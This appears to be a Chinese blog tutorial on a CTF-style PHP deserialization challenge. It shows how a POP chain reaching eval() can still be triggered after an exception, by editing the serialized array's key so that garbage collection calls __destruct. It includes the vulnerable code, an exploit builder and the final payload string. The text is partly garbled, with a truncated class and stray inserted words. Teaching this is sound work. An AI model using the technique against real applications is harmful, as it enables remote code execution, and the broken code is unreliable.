目录
前言简单铺垫初识GC小试牛刀总结前言
在前面讲魔术方法时就提到过一个问题,__destruct()无论如何都会被触发,但是前提是必须得完成程序的开始与结束,但是如果程序走了一半,突然报错,那么__destruct()不会触发了,那如果又必须要__destruct()触发又得怎么搞呢?
public $err; public function __toString() { echo "hello __toString"; $this->err->flag(); }} class errorr2{ public $err; public function flag() { echo "hello __flag()"; eval($this->err); }} $a=unserialize($_GET['url']);throw new Exception("就这?"); ?>
自己胡思乱想出来的题目,太简单也不要骂我哈哈哈。可能这个throw new Exception();有点突兀,这其实就是阻止__destruct()执行的抛错,学过java或者python的小伙伴应该知道。
这也算一个pop链子吧,先分析目的函数,看来看去就是errorr2::flag(),往前推就是errorr1::__toString()会触发这个函数,而errorr0::__destruct()kxGsU会触发toString,思路理清就把链子构造出来为:首端 --> errorr0::__destruct() --> errorr1::__toString() --> errorr2::flag() -->尾巴。
exp为:
kxGsU<?phperror_reporting(0);class errorr0{public $num;public function __construct(){$this->num = new errorr1();} }class errorr1{ public $err;public function __construct(){$this->err = new errorr2();}} class errorr2{ public $err = "phpinfo();";} $a = new errorr0();echo serialize($c);?>这个exp的构造有许多方法的,根据自己喜好来,不必和我一样。
这就完了?或许有人迷惑了,如果完了那前面我说的都是在放屁,和pop没区别,所以当然还没完。如果没有这句throw new Exception();就真的构造完了,但是有的话__destruct()是不会执行的,而__destruct()不执行这条链子根本就是堵死的,没啥用。
重点来了,根据之前说的GC回收机制可以把一段数据当做垃圾回收,那不就可以执行__destruct(),然后就有一个问题-------如何触发GC回收机制?!!还记得,之前举过的例子吗?如过没有如何东西指向一个对象,那个对象就会被当作垃圾回收。所以,我们先看修改后的exp
<?phperror_reporting(0);class errorr0{public $num;public function __construct(){$this-&g易采站长站t;num = new errorr1();} }class errorr1{ public $err;public function __construct(){$this->err = new errorr2();}} class errorr2{ public $err = "phpinfo();";} $a = new errorr0();$c = array(0=>$a,1=>NULL);echo serialize($c);?>可以看出来,就加了一行代码,就是
$c = array(0=>$a,1=>NULL);
把目标对象赋给键为0,键为1赋值为NULL。为什么要这么做,因为这样操作后,得到的字符串为:
a:2:{i:0;O:7:"errorr0":1:{s:3:"num";O:7:"errorr1":1:{s:3:"err";O:7:"errorr2":1:{s:3:"err";s:10:"phpinfo();";}}}i:1;N;}可以自己试试。解释一下这串字符。
第一个a为数组,2为数组中键有两个 i = 0以及 i = 1
重点重点重点,虽然有两个键i = 0对应的是我们目标对象,i = 1是NULL,如果这个时候我们做一件坏事,把i 本应该等于 1修改为 i = 0。那不就是把i = 0指向NULL了吗?然后就实现了GC回收。所以最后我们修改后的字符串为:
a:2:{i:0;O:7:"errorr0":1:{s:3:"num";O:7:"errorr1":1:{s:3:"err";O:7:"errorr2":1:{s:3:"err";s:10:"phpinfo();";}}}i:0;N;}
成功拿下!!这就是GC回收机制的利用,现在返回去看开始那个铺垫我想你应该就懂了。
总结
因为讲的GC回收机制并不算深入,只是谈谈如何利用,所以如果想要深入了解的还是得自己去百度查查别人写的原理,另外就是GC回收机制的利用需要修改字符串中的数据,如果phar反序列化+GC的话就还需要额外修改phar文件的签名,如果遇到的话就需要在修改序列化字符串后再对其进行加密得到的数据替换原本的签名。
参考:浅析GC回收机制与phar反序列化 | Arsene.Tang
https://www.jb51.net/article/70851.htm
